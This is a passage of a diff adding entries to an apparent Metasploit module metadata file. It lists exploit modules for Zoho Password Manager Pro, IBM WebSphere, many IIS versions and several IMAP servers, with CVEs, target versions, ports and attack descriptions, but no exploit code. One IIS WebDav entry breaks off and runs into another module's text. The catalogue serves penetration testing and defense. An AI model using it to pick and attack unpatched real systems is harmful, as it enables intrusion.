"Zoho Password Manager Pro XML-RPC Java Deserialization", + "fullname": "exploit/windows/http/zoho_password_manager_pro_xml_rpc_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2022-06-24", + "type": "exploit", + "author": [ + "Vinicius", + "Y4er", + "Grant Willcox" + ], + "description": "This module exploits a Java deserialization vulnerability in Zoho ManageEngine Pro\n before 12101 and PAM360 before 5510. Unauthenticated attackers can send a\n crafted XML-RPC request containing malicious serialized data to /xmlrpc to\n gain RCE as the SYSTEM user.", + "references": [ + "CVE-2022-35405", + "URL-https://xz.aliyun.com/t/11578", + "URL-https://www.manageengine.com/products/passwordmanagerpro/advisory/cve-2022-35405.html", + "URL-https://archives2.manageengine.com/passwordmanagerpro/12101/ManageEngine_PasswordManager_Pro_12100_to_12101.ppm" + ], + "platform": "Windows", + "arch": "cmd, x64", + "rport": 7272, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows EXE Dropper", + "Windows Command", + "Windows Powershell" + ], + "mod_time": "2022-08-02 14:27:27 +0000", + "path": "/modules/exploits/windows/http/zoho_password_manager_pro_xml_rpc_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/zoho_password_manager_pro_xml_rpc_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ibm/ibm_was_dmgr_java_deserialization_rce": { + "name": "IBM Websphere Application Server Network Deployment Untrusted Data Deserialization Remote Code Execution", + "fullname": "exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2019-05-15", + "type": "exploit", + "author": [ + "b0yd" + ], + "description": "This module exploits untrusted serialized data processed by the WAS DMGR Server and Cells.\n NOTE: There is a required 2 minute timeout between attempts as the neighbor being added must be reset.", + "references": [ + "CVE-2019-4279", + "URL-https://www-01.ibm.com/support/docview.wss?uid=ibm10883628" + ], + "platform": "Windows", + "arch": "", + "rport": 11006, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Binary", + "CMD" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ibm/ibm_was_dmgr_java_deserialization_rce.rb", + "is_install_path": true, + "ref_name": "windows/ibm/ibm_was_dmgr_java_deserialization_rce", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/iis/iis_webdav_scstoragepathfromurl": { + "name": "Microsoft IIS WebDav ScStoragePathFromUrl Overflow", + "fullname": "exploit/windows/iis/iis_webdav_scstoragepathfromurl", + "aliases": [], + "rank": 0, + "disclosure_date": "2017-03-26", + "type": "exploit", + "author": [ + "Zhiniang Peng", + "Chen Wu", + "Dominic Chell ", + "firefart", + "zcgonvh ", + "Rich Whitcroft", + "Lincoln" + ], + "description": "Buffer overflow in the ScStoragePathFromUrl function\n in the WebDAV service in Internet Information Services (IIS) 6.0\n in Microsoft Windows Server 2003 R2 allows remote attackers to\n execute arbitrary code via a long header beginning with\n \"If: " + ], + "description": "This module can be used to execute a payload on IIS servers that\n have world-writeable directories. The payload is uploaded as an ASP\n script via a WebDAV PUT request.\n\n The target IIS machine must meet these conditions to be considered\n as exploitable: It allows 'Script resource access', Read and Write\n permission, and supports ASP.", + "references": [ + "OSVDB-397", + "BID-12141" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2019-05-22 09:05:56 +0000", + "path": "/modules/exploits/windows/iis/iis_webdav_upload_asp.rb", + "is_install_path": true, + "ref_name": "windows/iis/iis_webdav_upload_asp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/iis/ms01_023_printer": { + "name": "MS01-023 Microsoft IIS 5.0 Printer Host Header Overflow", + "fullname": "exploit/windows/iis/ms01_023_printer", + "aliases": [], + "rank": 400, + "disclosure_date": "2001-05-01", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This exploits a buffer overflow in the request processor of the\n Internet Printing Protocol ISAPI module in IIS. This module\n works against Windows 2000 Server and Professional SP0-SP1.\n\n If the service stops responding after a successful compromise,\n run the exploit a couple more times to completely kill the\n hung process.", + "references": [ + "CVE-2001-0241", + "OSVDB-3323", + "BID-2674", + "MSB-MS01-023", + "URL-https://seclists.org/lists/bugtraq/2001/May/0005.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows 2000 SP0-SP1 (Arabic)", + "Windows 2000 SP0-SP1 (Czech)", + "Windows 2000 SP0-SP1 (Chinese)", + "Windows 2000 SP0-SP1 (Dutch)", + "Windows 2000 SP0-SP1 (English)", + "Windows 2000 SP0-SP1 (French)", + "Windows 2000 SP0-SP1 (Finnish)", + "Windows 2000 SP0-SP1 (German)", + "Windows 2000 SP0-SP1 (Korean)", + "Windows 2000 SP0-SP1 (Hungarian)", + "Windows 2000 SP0-SP1 (Italian)", + "Windows 2000 SP0-SP1 (Portuguese)", + "Windows 2000 SP0-SP1 (Spanish)", + "Windows 2000 SP0-SP1 (Swedish)", + "Windows 2000 SP0-SP1 (Turkish)", + "Windows 2000 Pro SP0 (Greek)", + "Windows 2000 Pro SP1 (Greek)" + ], + "mod_time": "2022-07-09 01:36:10 +0000", + "path": "/modules/exploits/windows/iis/ms01_023_printer.rb", + "is_install_path": true, + "ref_name": "windows/iis/ms01_023_printer", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [ + "repeatable-session" + ], + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/iis/ms01_026_dbldecode": { + "name": "MS01-026 Microsoft IIS/PWS CGI Filename Double Decode Command Execution", + "fullname": "exploit/windows/iis/ms01_026_dbldecode", + "aliases": [], + "rank": 600, + "disclosure_date": "2001-05-15", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module will execute an arbitrary payload on a Microsoft IIS installation\n that is vulnerable to the CGI double-decode vulnerability of 2001.\n\n This module has been tested successfully on:\n\n Windows 2000 Professional (SP0) (EN);\n Windows 2000 Professional (SP1) (AR);\n Windows 2000 Professional (SP1) (CZ);\n Windows 2000 Server (SP0) (FR);\n Windows 2000 Server (SP1) (EN); and\n Windows 2000 Server (SP1) (SE).\n\n Note: This module will leave a Metasploit payload exe in the IIS scripts directory.", + "references": [ + "CVE-2001-0333", + "OSVDB-556", + "BID-2708", + "MSB-MS01-026", + "URL-http://marc.info/?l=bugtraq&m=98992056521300&w=2" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows (Dropper)", + "Windows (Command)" + ], + "mod_time": "2022-07-03 18:22:55 +0000", + "path": "/modules/exploits/windows/iis/ms01_026_dbldecode.rb", + "is_install_path": true, + "ref_name": "windows/iis/ms01_026_dbldecode", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/iis/ms01_033_idq": { + "name": "MS01-033 Microsoft IIS 5.0 IDQ Path Overflow", + "fullname": "exploit/windows/iis/ms01_033_idq", + "aliases": [], + "rank": 400, + "disclosure_date": "2001-06-18", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the IDQ ISAPI handler for\n Microsoft Index Server.", + "references": [ + "CVE-2001-0500", + "OSVDB-568", + "MSB-MS01-033", + "BID-2880" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Pro English SP0", + "Windows 2000 Pro English SP1-SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/iis/ms01_033_idq.rb", + "is_install_path": true, + "ref_name": "windows/iis/ms01_033_idq", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/iis/ms02_018_htr": { + "name": "MS02-018 Microsoft IIS 4.0 .HTR Path Overflow", + "fullname": "exploit/windows/iis/ms02_018_htr", + "aliases": [], + "rank": 400, + "disclosure_date": "2002-04-10", + "type": "exploit", + "author": [ + "stinko " + ], + "description": "This exploits a buffer overflow in the ISAPI ISM.DLL used to\n process HTR scripting in IIS 4.0. This module works against\n Windows NT 4 Service Packs 3, 4, and 5. The server will\n continue to process requests until the payload being\n executed has exited. If you've set EXITFUNC to 'seh', the\n server will continue processing requests, but you will have\n trouble terminating a bind shell. If you set EXITFUNC to\n thread, the server will crash upon exit of the bind shell.\n The payload is alpha-numerically encoded without a NOP sled\n because otherwise the data gets mangled by the filters.", + "references": [ + "CVE-1999-0874", + "OSVDB-3325", + "BID-307", + "URL-http://www.eeye.com/html/research/advisories/AD19990608.html", + "MSB-MS02-018" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows NT 4.0 SP3", + "Windows NT 4.0 SP4", + "Windows NT 4.0 SP5" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/iis/ms02_018_htr.rb", + "is_install_path": true, + "ref_name": "windows/iis/ms02_018_htr", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/iis/ms02_065_msadc": { + "name": "MS02-065 Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow", + "fullname": "exploit/windows/iis/ms02_065_msadc", + "aliases": [], + "rank": 300, + "disclosure_date": "2002-11-02", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module can be used to execute arbitrary code on IIS servers\n that expose the /msadc/msadcs.dll Microsoft Data Access Components\n (MDAC) Remote Data Service (RDS) DataFactory service. The service is\n exploitable even when RDS is configured to deny remote connections\n (handsafe.reg). The service is vulnerable to a heap overflow where\n the RDS DataStub 'Content-Type' string is overly long. Microsoft Data\n Access Components (MDAC) 2.1 through 2.6 are known to be vulnerable.", + "references": [ + "OSVDB-14502", + "BID-6214", + "CVE-2002-1142", + "MSB-MS02-065", + "URL-http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0082.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows 2000 Pro SP0-SP3 (English)", + "Windows 2000 Pro SP0 (Korean)", + "Windows 2000 Pro SP0 (Dutch)", + "Windows 2000 Pro SP0 (Finnish)", + "Windows 2000 Pro SP0 (Turkish)", + "Windows 2000 Pro SP0-SP1 (Greek)", + "Windows 2000 Pro SP1 (Arabic)", + "Windows 2000 Pro SP1 (Czech)", + "Windows 2000 Pro SP2 (French)", + "Windows 2000 Pro SP2 (Portuguese)" + ], + "mod_time": "2022-07-15 00:15:56 +0000", + "path": "/modules/exploits/windows/iis/ms02_065_msadc.rb", + "is_install_path": true, + "ref_name": "windows/iis/ms02_065_msadc", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [ + "repeatable-session" + ], + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/iis/ms03_007_ntdll_webdav": { + "name": "MS03-007 Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow", + "fullname": "exploit/windows/iis/ms03_007_ntdll_webdav", + "aliases": [], + "rank": 500, + "disclosure_date": "2003-05-30", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This exploits a buffer overflow in NTDLL.dll on Windows 2000\n through the SEARCH WebDAV method in IIS. This particular\n module only works against Windows 2000. It should have a\n reasonable chance of success against SP0 to SP3.", + "references": [ + "CVE-2003-0109", + "OSVDB-4467", + "BID-7116", + "PACKETSTORM-30939", + "MSB-MS03-007" + ], + "platform": "Windows", + "arch": "x86", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Brute Force" + ], + "mod_time": "2022-07-07 20:31:57 +0000", + "path": "/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb", + "is_install_path": true, + "ref_name": "windows/iis/ms03_007_ntdll_webdav", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [ + "repeatable-session" + ], + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/iis/msadc": { + "name": "MS99-025 Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution", + "fullname": "exploit/windows/iis/msadc", + "aliases": [], + "rank": 600, + "disclosure_date": "1998-07-17", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module can be used to execute arbitrary commands on IIS servers\n that expose the /msadc/msadcs.dll Microsoft Data Access Components\n (MDAC) Remote Data Service (RDS) DataFactory service using VbBusObj\n or AdvancedDataFactory to inject shell commands into Microsoft Access\n databases (MDBs), MSSQL databases and ODBC/JET Data Source Name (DSN).\n Based on the msadcs.pl v2 exploit by Rain.Forest.Puppy, which was actively\n used in the wild in the late Ninties. MDAC versions affected include MDAC\n 1.5, 2.0, 2.0 SDK, 2.1 and systems with the MDAC Sample Pages for RDS\n installed, and NT4 Servers with the NT Option Pack installed or upgraded\n 2000 systems often running IIS3/4/5 however some vulnerable installations\n can still be found on newer Windows operating systems. Note that newer\n releases of msadcs.dll can still be abused however by default remote\n connections to the RDS is denied. Consider using VERBOSE if you're unable\n to successfully execute a command, as the error messages are detailed\n and useful for debugging. Also set NAME to obtain the remote hostname,\n and METHOD to use the alternative VbBusObj technique.", + "references": [ + "OSVDB-272", + "BID-529", + "CVE-1999-1011", + "MSB-MS98-004", + "MSB-MS99-025" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2022-06-29 19:10:52 +0000", + "path": "/modules/exploits/windows/iis/msadc.rb", + "is_install_path": true, + "ref_name": "windows/iis/msadc", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/imap/eudora_list": { + "name": "Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow", + "fullname": "exploit/windows/imap/eudora_list", + "aliases": [], + "rank": 500, + "disclosure_date": "2005-12-20", + "type": "exploit", + "author": [ + "MC ", + "jduck " + ], + "description": "This module exploits a stack buffer overflow in the Qualcomm WorldMail IMAP Server\n version 3.0 (builds 6.1.19.0 through 6.1.22.0). Version 6.1.22.1 fixes this\n particular vulnerability.\n\n NOTE: The service does NOT restart automatically by default. You may be limited to\n only one attempt, so choose wisely!", + "references": [ + "CVE-2005-4267", + "OSVDB-22097", + "BID-15980" + ], + "platform": "Windows", + "arch": "", + "rport": 143, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "WorldMail 3 Version 6.1.19.0", + "WorldMail 3 Version 6.1.20.0", + "WorldMail 3 Version 6.1.22.0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/imap/eudora_list.rb", + "is_install_path": true, + "ref_name": "windows/imap/eudora_list", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/imap/imail_delete": { + "name": "IMail IMAP4D Delete Overflow", + "fullname": "exploit/windows/imap/imail_delete", + "aliases": [], + "rank": 200, + "disclosure_date": "2004-11-12", + "type": "exploit", + "author": [ + "spoonm " + ], + "description": "This module exploits a buffer overflow in the 'DELETE'\n command of the IMail IMAP4D service. This vulnerability\n can only be exploited with a valid username and password.\n This flaw was patched in version 8.14.", + "references": [ + "CVE-2004-1520", + "OSVDB-11838", + "BID-11675" + ], + "platform": "Windows", + "arch": "", + "rport": 143, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP sp0 comctl32.dll" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/imap/imail_delete.rb", + "is_install_path": true, + "ref_name": "windows/imap/imail_delete", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/imap/ipswitch_search": { + "name": "Ipswitch IMail IMAP SEARCH Buffer Overflow", + "fullname": "exploit/windows/imap/ipswitch_search", + "aliases": [], + "rank": 200, + "disclosure_date": "2007-07-18", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Ipswitch IMail Server 2006.1 IMAP SEARCH\n verb. By sending an overly long string, an attacker can overwrite the\n buffer and control program execution.\n In order for this module to be successful, the IMAP user must have at least one\n message.", + "references": [ + "CVE-2007-3925", + "OSVDB-36219", + "BID-24962" + ], + "platform": "Windows", + "arch": "", + "rport": 143, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Pro SP4 English", + "Windows 2003 SP0 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/imap/ipswitch_search.rb", + "is_install_path": true, + "ref_name": "windows/imap/ipswitch_search", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/imap/mailenable_login": { + "name": "MailEnable IMAPD (2.34/2.35) Login Request Buffer Overflow", + "fullname": "exploit/windows/imap/mailenable_login", + "aliases": [], + "rank": 500, + "disclosure_date": "2006-12-11", + "type": "exploit", + "author": [ + "MC " + ], + "description": "MailEnable's IMAP server contains a buffer overflow\n vulnerability in the Login command.", + "references": [ + "CVE-2006-6423", + "OSVDB-32125", + "BID-21492" + ], + "platform": "Windows", + "arch": "", + "rport": 143, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "MailEnable 2.35 Pro", + "MailEnable 2.34 Pro" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/imap/mailenable_login.rb", + "is_install_path": true, + "ref_name": "windows/imap/mailenable_login", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/imap/mailenable_status": { + "name": "MailEnable IMAPD (1.54) STATUS Request Buffer Overflow", + "fullname": "exploit/windows/imap/mailenable_status", + "aliases": [], + "rank": 500, + "disclosure_date": "2005-07-13", + "type": "exploit", + "author": [ + "MC " + ], + "description": "MailEnable's IMAP server contains a buffer overflow\n vulnerability in the STATUS command. With proper\n credentials, this could allow for the execution of arbitrary\n code.", + "references": [ + "CVE-2005-2278", + "OSVDB-17844", + "BID-14243", + "URL-http://www.nessus.org/plugins/index.php?view=single&id=19193" + ], + "platform": "Windows", + "arch": "", + "rport": 143, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "MailEnable 1.54 Pro Universal", + "Windows XP Pro SP0/SP1 English", + "Windows 2000 Pro English ALL", + "Windows 2003 Server English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/imap/mailenable_status.rb", + "is_install_path": true, + "ref_name": "windows/imap/mailenable_status", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/imap/mailenable_w3c_select": { + "name": "MailEnable IMAPD W3C Logging Buffer Overflow", + "fullname": "exploit/windows/imap/mailenable_w3c_select", + "aliases": [], + "rank": 500, + "disclosure_date": "2005-10-03", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer overflow in the W3C logging\n functionality of the MailEnable IMAPD service. Logging is\n not enabled by default and this exploit requires a valid\n username and password to exploit the flaw. MailEnable\n Professional version 1.6 and prior and MailEnable Enterprise\n version 1.1 and prior are affected.", + "references": [ + "CVE-2005-3155", + "OSVDB-19842", + "BID-15006" + ], + "platform": "Windows", + "arch": "", + "rport": 143, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "MailEnable 1.54 Pro Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/imap/mailenable_w3c_select.rb", + "is_install_path": true, + "ref_name": "windows/imap/mailenable_w3c_select", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/imap/mdaemon_cram_md5": { + "name": "Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow", + "fullname": "exploit/windows/imap/mdaemon_cram_md5", + "aliases": [], + "rank": 500, + "disclosure_date": "2004-11-12", + "type": "exploit", + "author": [ + "Unknown" + ], + "description": "This module exploits a buffer overflow in the CRAM-MD5\n authentication of the MDaemon IMAP service. This\n vulnerability was discovered by Muts.", + "references": [ + "CVE-2004-1520", + "OSVDB-11838", + "BID-11675" + ], + "platform": "Windows", + "arch": "", + "rport": 143, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "MDaemon IMAP 8.0.3 Windows XP SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/imap/mdaemon_cram_md5.rb", + "is_install_path": true, + "ref_name": "windows/imap/mdaemon_cram_md5", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/imap/mdaemon_fetch": { + "name": "MDaemon 9.6.4 IMAPD FETCH Buffer Overflow", + "fullname": "exploit/windows/imap/mdaemon_fetch", + "aliases": [], + "rank": 500, + "disclosure_date": "2008-03-13", + "type": "exploit", + "author": [ + "Jacopo Cervini", + "aushack " + ], + "description": "This module exploits a stack buffer overflow in the Alt-N MDaemon IMAP Server\n version 9.6.4 by sending an overly long FETCH BODY command. Valid IMAP\n account credentials are required. Credit to Matteo Memelli", + "references": [ + "CVE-2008-1358", + "OSVDB-43111", + "BID-28245", + "EDB-5248" + ], + "platform": "Windows", + "arch": "", + "rport": 143, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "MDaemon Version 9.6.4" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/imap/mdaemon_fetch.rb", + "is_install_path": true, + "ref_name": "windows/imap/mdaemon_fetch", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/imap/mercur_imap_select_overflow": { + "name": "Mercur v5.0 IMAP SP3 SELECT Buffer Overflow", + "fullname": "exploit/windows/imap/mercur_imap_select_overflow", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-03-17", + "type": "exploit", + "author": [ + "Jacopo Cervini " + ], + "description": "Mercur v5.0 IMAP server is prone to a remotely exploitable\n stack-based buffer overflow vulnerability. This issue is due\n to a failure of the application to properly bounds check\n user-supplied data prior to copying it to a fixed size memory buffer.\n Credit to Tim Taylor for discover the vulnerability.", + "references": [ + "CVE-2006-1255", + "OSVDB-23950", + "BID-17138" + ], + "platform": "Windows", + "arch": "", + "rport": 143, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Server SP4 English", + "Windows 2000 Pro SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/imap/mercur_imap_select_overflow.rb", + "is_install_path": true, + "ref_name": "windows/imap/mercur_imap_select_overflow", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/imap/mercur_login": { + "name": "Mercur Messaging 2005 IMAP Login Buffer Overflow", + "fullname": "exploit/windows/imap/mercur_login", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-03-17", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Atrium Mercur IMAP 5.0 SP3.\n Since the room for shellcode is small, using the reverse ordinal payloads\n yields the best results.", + "references": [ + "CVE-2006-1255", + "OSVDB-23950", + "BID-17138", + "URL-http://archives.neohapsis.com/archives/fulldisclosure/2006-03/1104.html" + ], + "platform": "Windows", + "arch": "", + "rport": 143, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Pro SP4 English", + "Windows XP Pro SP2 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/imap/mercur_login.rb", + "is_install_path": true, + "ref_name": "windows/imap/mercur_login", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/imap/mercury_login": { + "name": "Mercury/32 4.01 IMAP LOGIN SEH Buffer Overflow", + "fullname": "exploit/windows/imap/mercury_login", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-03-06", + "type": "exploit", + "author": [ + "mu-b", + "MC ", + "Ivan Racic" + ], + "description": "This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD\n LOGIN verb. By sending a specially crafted login command, a buffer\n is corrupted, and code execution is possible. This vulnerability was\n discovered by (mu-b at digit-labs.org).", + "references": [ + "CVE-2007-1373", + "EDB-3418" + ], + "platform": "Windows", + "arch": "", + "rport": 143, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/imap/mercury_login.rb", + "is_install_path": true, + "ref_name": "windows/imap/mercury_login", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/imap/mercury_rename": { + "name": "Mercury/32 v4.01a IMAP RENAME Buffer Overflow", + "fullname": "exploit/windows/imap/mercury_rename", + "aliases": [], + "rank": 200, + "disclosure_date": "2004-11-29", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow vulnerability in the\n Mercury/32 v.4.01a IMAP service.", + "references": [ + "CVE-2004-1211", + "OSVDB-12508", + "BID-11775", + "URL-http://www.nessus.org/plugins/index.php?view=single&id=15867" + ], + "platform": "Windows", + "arch": "", + "rport": 143, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows 2000 SP4 English", + "Windows XP Pro SP0 English", + "Windows XP Pro SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/imap/mercury_rename.rb", + "is_install_path": true, + "ref_name": "windows/imap/mercury_rename", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/imap/novell_netmail_append": { + "name": "Novell NetMail IMAP APPEND Buffer Overflow", + "fullname": "exploit/windows/imap/novell_netmail_append", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-12-23", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Novell's Netmail 3.52 IMAP APPEND\n verb. By sending an overly long string, an attacker can overwrite the\n buffer and control program execution.", + "references": [ + "CVE-2006-6425", + "OSVDB-31362", + "BID-21723", + "ZDI-06-054" + ], + "platform": "Windows", + "arch": "", + "rport": 143, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 SP0-SP4 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/imap/novell_netmail_append.rb", + "is_install_path": true, + "ref_name": "windows/imap/novell_netmail_append", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/imap/novell_netmail_auth": { + "name": "Novell NetMail IMAP AUTHENTICATE Buffer Overflow", + "fullname": "exploit/windows/imap/novell_netmail_auth", + "aliases": [], + "rank": 200, + "disclosure_date": "2007-01-07", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP AUTHENTICATE\n GSSAPI command. By sending an overly long string, an attacker can overwrite the\n buffer and control program execution. Using the PAYLOAD of windows/shell_bind_tcp\n or windows/shell_reverse_tcp allows for the most reliable results.", + "references": [ + "OSVDB-55175" + ], + "platform": "Windows", + "arch": "", + "rport": 143, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 SP0-SP4 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/imap/novell_netmail_auth.rb", + "is_install_path": true, + "ref_name": "windows/imap/novell_netmail_auth", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/imap/novell_netmail_status": { + "name": "Novell NetMail IMAP STATUS Buffer Overflow", + "fullname": "exploit/windows/imap/novell_netmail_status", + "aliases": [], + "rank": 200, + 